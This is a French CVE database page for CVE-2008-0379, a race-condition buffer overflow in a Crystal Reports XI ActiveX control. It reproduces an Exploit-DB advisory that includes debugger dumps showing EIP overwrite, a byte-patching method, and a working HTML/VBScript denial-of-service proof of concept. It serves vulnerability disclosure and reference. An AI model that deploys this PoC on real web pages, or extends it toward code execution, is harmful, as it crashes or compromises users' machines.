CVE-2008-0379 : Détail

CVE-2008-0379

Overflow
14%V4
Network
2008-01-22
18h00 +00:00
2017-09-28
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Race condition in the Enterprise Tree ActiveX control (EnterpriseControls.dll 11.5.0.313) in Crystal Reports XI Release 2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the SelectedSession method, which triggers a buffer overflow.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.
CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 4931

Date de publication : 2008-01-16 23h00 +00:00
Auteur : shinnai
EDB Vérifié : Yes

##################################################################################### Application: Crystal Reports XI Release 2 (Enterprise Tree Control) Remote BoF/Dos www.businessobjects.com Versions: 11 Platforms: Windows XP Professional Bug: buffer-overflow Exploitation: remote Date: 2007-01-16 Author: shinnai e-mail: shinnai[at]autistici[dot]org web: http://shinnai.altervista.org ##################################################################################### 1) Introduction 2) Technical details and bug 3) The Code 4) Fix ##################################################################################### =============== 1) Introduction =============== This component is used to visualize on the web reports created with Crystal Reports ##################################################################################### ============================ 2) Technical details and bug ============================ Name: EnterpriseControls.dll Ver.: 11.5.0.313 CLSID: {3D58C9F3-7CA5-4C44-9D62-C5B63E059050} MD5: 179e2dc7f9f6e9d6e0210e89c623fd72 Marked as: RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data The problem is a buffer-overflow which occours when you use the "SelectedSession()" method. It seems that, during the initialization of the component, a race condition occours between threads and 4 bytes of the same component will overwrite EIP. If you patch these 4 bytes, you can control this register, using it to jump to a shellcode and execute arbitrary code on user's pc. For exploiting this vulnerability you only need to create a web page containing the CLSID and the codebase path to your crafted ActiveX. These are registers using the original file: 14:59:34.126 pid=1468 tid=1250 EXCEPTION (first-chance) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928]) ---------------------------------------------------------------- EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9 EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01 EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03 ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A ---------------------------------------------------------------- 14:59:34.142 pid=1468 tid=1250 EXCEPTION (unhandled) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928]) ---------------------------------------------------------------- EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9 EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01 EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03 ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A ---------------------------------------------------------------- We'll find these 4 bytes at this address: 0x000172D8 "28 E9 7D FF"... using an hex editor to modify to: 0x000172D8 "42 42 42 42"... we'll have: C:\Tools>bindiff /c /d EnterpriseControls_patched.dll EnterpriseControls_ori.dll Different, Left is newer 4 bytes differ ================================================================================ 000172D0 87 FF FF FF 83 6C 24 04 .....l$. 87 FF FF FF 83 6C 24 04 .....l$. 000172D8 <42 42 42 42>FF FF 83 6C BBBB...l <28 E9 7D FF>FF FF 83 6C (.}....l 000172E0 24 04 2C E9 $.,. 24 04 2C E9 $.,. ================================================================================ File Count Summary Identical: 0 files Near Identical: 0 files Different: 1 files Left Only: 0 files Right Only: 0 files Errors: 0 files Total: 1 files Byte Count Summary Matched: 4 bytes differ Left Only: 0 bytes Right Only: 0 bytes Total: 4 bytes and registers values will be: 15:05:38.947 pid=12D4 tid=1240 EXCEPTION (first-chance) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [42424242]) ---------------------------------------------------------------- EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9 EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01 EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02 ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A ---------------------------------------------------------------- 15:05:38.978 pid=12D4 tid=1240 EXCEPTION (unhandled) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [42424242]) ---------------------------------------------------------------- EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9 EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01 EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02 ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A ---------------------------------------------------------------- isn't it fun? Naturally, EIP overwrite requires that someone uses the crafted dll otherwise you can just enjoy a crash of tha application. ##################################################################################### =========== 3) The Code =========== I will release a public exploit but, this time, no code execution ;-) Everything I could say is that you can directly inject your shellcode into the dll or pass an argument to "SelectedSession()" method and then jump to the shellcode. Poc: Click here for DoS exploit <html> <object classid='clsid:3D58C9F3-7CA5-4C44-9D62-C5B63E059050' id='test'></object> <script language = 'vbscript'> test.SelectedSession = "" </script> </html> ##################################################################################### ====== 4) Fix ====== No fix ##################################################################################### # milw0rm.com [2008-01-17]

Products Mentioned

Configuraton 0

Businessobjects>>Crystal_reports_xi >> Version r2

Références

https://www.exploit-db.com/exploits/4931
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/27333
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1019239
Tags : vdb-entry, x_refsource_SECTRACK
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.